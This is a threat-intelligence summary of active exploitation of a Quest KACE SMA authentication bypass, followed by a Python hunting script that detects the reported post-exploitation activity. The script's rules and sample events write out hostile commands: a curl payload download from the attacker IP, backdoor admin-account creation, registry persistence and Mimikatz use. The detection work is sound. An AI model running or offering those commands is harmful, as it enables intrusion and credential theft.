Authentication Bypass in Quest KACE SMA Exploited in the Wild to Achieve Full System Compromise
Summary
Threat actors are actively exploiting CVE-2025-32975, a maximum-severity authentication bypass vulnerability in Quest KACE Systems Management Appliance (SMA), to gain administrative control over unpatched internet-exposed systems. The flaw enables attackers to impersonate legitimate users without valid credentials, leading to full system takeover. Observed activity began the week of March 9, 2026, and includes lateral movement, credential harvesting, and persistence mechanisms. The vulnerability was patched by Quest in May 2025, but unpatched systems remain at critical risk.
Timeline
- 23.03.2026 08:15 (1 article)
  Active exploitation of CVE-2025-32975 in Quest KACE SMA leads to full system compromise
  Threat actors began exploiting CVE-2025-32975, a CVSS 10.0 authentication bypass flaw in Quest KACE SMA, the week of March 9, 2026. The vulnerability allows full administrative takeover without credentials. Attackers are weaponizing the flaw to execute remote commands, drop payloads, create backdoor accounts, and harvest credentials, enabling lateral movement to domain controllers and backup infrastructure.
  - Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
Information Snippets
- CVE-2025-32975 (CVSS score: 10.0) is an authentication bypass vulnerability in Quest KACE SMA that allows attackers to impersonate legitimate users without valid credentials.
  First reported: 23.03.2026 08:15 (1 source, 1 article)
  - Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
- Active exploitation of CVE-2025-32975 was observed starting the week of March 9, 2026, targeting unpatched, internet-exposed Quest KACE SMA systems.
  First reported: 23.03.2026 08:15 (1 source, 1 article)
  - Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
- Successful exploitation enables attackers to seize control of administrative accounts and execute remote commands.
  First reported: 23.03.2026 08:15 (1 source, 1 article)
  - Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
- Post-exploitation activity includes dropping Base64-encoded payloads from 216.126.225[.]156 using the curl command, creating additional administrative accounts via runkbot.exe, and modifying the Windows Registry via PowerShell for persistence.
  First reported: 23.03.2026 08:15 (1 source, 1 article)
  - Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
- Additional observed tactics include credential harvesting (Mimikatz), reconnaissance (enumerating users, running 'net time' and 'net group' commands), and obtaining RDP access to backup infrastructure (Veeam, Veritas) and domain controllers.
  First reported: 23.03.2026 08:15 (1 source, 1 article)
  - Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
- Quest KACE SMA versions 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4) contain the fix for CVE-2025-32975.
  First reported: 23.03.2026 08:15 (1 source, 1 article)
  - Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
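
A hunt for the post-exploitation behaviours listed above, run over process-creation records, as an added example (not code from Quest or the cited article). Assumptions: the pipe-delimited record format, the rule labels and the sample events are constructed for illustration, and the account-creation and registry rules assume `net user`/`net localgroup` and `Set-ItemProperty`/`New-ItemProperty`, which the page does not specify.

```python
import re

def refang(text):
    """Turn a defanged indicator such as 1.2.3[.]4 back into plain form."""
    return text.replace("[.]", ".")

# Download host exactly as the page writes it; refanged only for matching.
C2_IP = refang("216.126.225[.]156")

# Behaviours named on the page as (label, regex over the command line).
# The concrete commands for account creation and registry edits are assumed.
RULES = [
    ("payload_download", re.compile(r"\bcurl(\.exe)?\b.*" + re.escape(C2_IP), re.I)),
    ("account_creation", re.compile(r"\bnet1?(\.exe)?\s+(user|localgroup)\b.*\s/add\b", re.I)),
    ("registry_persistence",
     re.compile(r"powershell.*\b(Set-ItemProperty|New-ItemProperty)\b.*\b(HKLM|HKCU):", re.I)),
    ("recon", re.compile(r"\bnet1?(\.exe)?\s+(time|group)\b", re.I)),
    ("credential_tool", re.compile(r"mimikatz", re.I)),
]

def parse_event(line):
    """Split a 'host|parent|image|command line' record (constructed format)."""
    host, parent, image, cmdline = line.split("|", 3)
    return {"host": host, "parent": parent.lower(), "image": image.lower(), "cmdline": cmdline}

def hunt(lines):
    """Return (host, label, via_kace_agent) for every event matching a rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        # True when the KACE agent binary named on the page launched the process.
        via_agent = ev["parent"].endswith("runkbot.exe")
        for label, rx in RULES:
            if rx.search(ev["cmdline"]):
                hits.append((ev["host"], label, via_agent))
    return hits

# Constructed sample events, not taken from any real incident.
SAMPLE = [
    f"ws01|runkbot.exe|curl.exe|curl -o C:\\Temp\\p.b64 http://{C2_IP}/p",
    r"ws01|runkbot.exe|net.exe|net localgroup administrators svc_example /add",
    r"ws01|cmd.exe|powershell.exe|powershell Set-ItemProperty -Path HKLM:\SOFTWARE\Example -Name Ex -Value 1",
    r'dc01|cmd.exe|net.exe|net group "Domain Admins" /domain',
    r"ws02|explorer.exe|notepad.exe|notepad C:\Users\a\notes.txt",
]

if __name__ == "__main__":
    for host, label, via_agent in hunt(SAMPLE):
        print(f"{host}: {label} (spawned by runkbot.exe: {via_agent})")
```

Hits where the third field is true are the ones tied to the KACE agent on a managed endpoint and are the first to triage.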